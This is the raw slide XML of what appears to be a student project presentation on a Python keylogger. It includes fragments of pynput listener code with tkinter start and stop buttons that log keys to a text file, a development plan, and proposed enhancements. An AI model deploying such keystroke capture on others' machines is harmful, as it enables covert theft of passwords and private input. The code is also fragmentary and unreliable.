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93" d="100"/>
          <a:sy n="93"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4/5/2024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0886446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9" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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3034426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78" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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5820482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82" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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8152734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87" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88"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4003600"/>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91" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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80699575"/>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95" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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4414410"/>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
        <p:nvSpPr>
          <p:cNvPr id="99" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10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82799604"/>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
        <p:nvSpPr>
          <p:cNvPr id="110" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11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5673992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0" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4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3706124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685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4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1448903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48" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4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4810531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3" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5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6342688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58" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5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439362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3" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6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0195916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68" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6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901335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73" name="对象"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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33077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6" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="446534" y="457200"/>
            <a:ext cx="3703319" cy="94997"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="465359"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8042147" y="453643"/>
            <a:ext cx="3703318" cy="98554"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4241830" y="457200"/>
            <a:ext cx="3703318" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10485002" y="6437910"/>
            <a:ext cx="1125803" cy="365126"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20"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21"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noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>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4/5/2024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noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>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04566470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2066869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418670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2" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="8042147" y="453643"/>
            <a:ext cx="3703318"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8"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4"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3"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5"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6"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67023769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0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102" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="8042147" y="453643"/>
            <a:ext cx="3703318"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103" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="4241830" y="457200"/>
            <a:ext cx="3703318"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104"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3"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05"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06"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107"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108"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35313029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011480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860714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700203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302133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007968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973024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455671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012501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8" cy="98554"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4241830" y="457200"/>
            <a:ext cx="3703318"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3" cy="365126"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="644507016"/>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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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1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keyloggers</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10166"/>
            <a:ext cx="7980183" cy="6819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1.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Hemaraj T</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-Dmi college of engineering IT</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38128795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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-42707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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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77" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="480131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start_keylogger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start_keylogger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global listener</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listener =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keyboard.Listener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on_press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on_press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on_release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on_release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listener.start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label.config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(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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start_button.config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(state='disabled')</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stop_button.config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(state='normal')</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stop_keylogger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stop_keylogger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global listener</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listener.stop</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label.config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(text="Keylogger stopped.")</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start_button</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13939480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pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991267" cy="3419952"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175323847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pic>
        <p:nvPicPr>
          <p:cNvPr id="85" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="904352" y="1692539"/>
            <a:ext cx="7487694" cy="752580"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="720801" y="3458123"/>
            <a:ext cx="11250407" cy="1563406"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17946611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9"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90" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="901232" y="0"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans" pitchFamily="0" charset="0"/>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502275597"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>There are several ways in which the keylogger program can be improved and enhanced in the future. Here are some possible ideas:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Real-time monitoring: The program can be enhanced to provide real-time monitoring of keystrokes. This can be useful for detecting and preventing malicious activities in real-time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Filtering of specific keywords: The program can be enhanced to filter specific keywords and provide alerts when those keywords are detected. This can be useful for detecting and preventing unauthorized access to sensitive information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Integration with other security tools: The program can be integrated with other security tools, such as firewalls and intrusion detection systems, to provide a more comprehensive security solution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Cross-platform compatibility: The program can be enhanced to support cross-platform compatibility, allowing it to be used on different operating systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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94"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9966830"/>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7"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98"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1. </a:t>
            </a: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hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endPar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591624638"/>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52913365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9" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="58649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76083481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3" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="3232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374151"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Times New Roman"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zh-CN" altLang="en-US" sz="24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100000294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7" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="909017" y="23393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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>To overcome the limitations of the existing keylogger program, we propose to develop a new keylogger with the following features:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Improved keylogging functionality: The new keylogger will be able to differentiate between key presses and key releases and record them separately.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>GUI for easy start and stop of the keylogger: The new keylogger will have a GUI that allows the user to start and stop the keylogger with a single click.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>JSON file generation: The new keylogger will generate a JSON file that contains the keylogging data, making it easier to analyze and visualize the data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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73414090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	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="1145611"/>
            <a:ext cx="11791686" cy="3787649"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="0" tIns="198375" rIns="0" bIns="198375"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rgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"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None/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="11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Design the GUI: Create a simple GUI using </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tkinter</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that includes a start and stop button.</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startAt="2"/>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Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>pynput</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library to capture the key presses and releases.</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startAt="3"/>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Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>json</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library to generate a JSON file that contains the</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None/>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keylogging data.</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startAt="4"/>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Integrate the keylogger functionality with the GUI: Connect the GUI buttons to the keylogger functionality.</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None/>
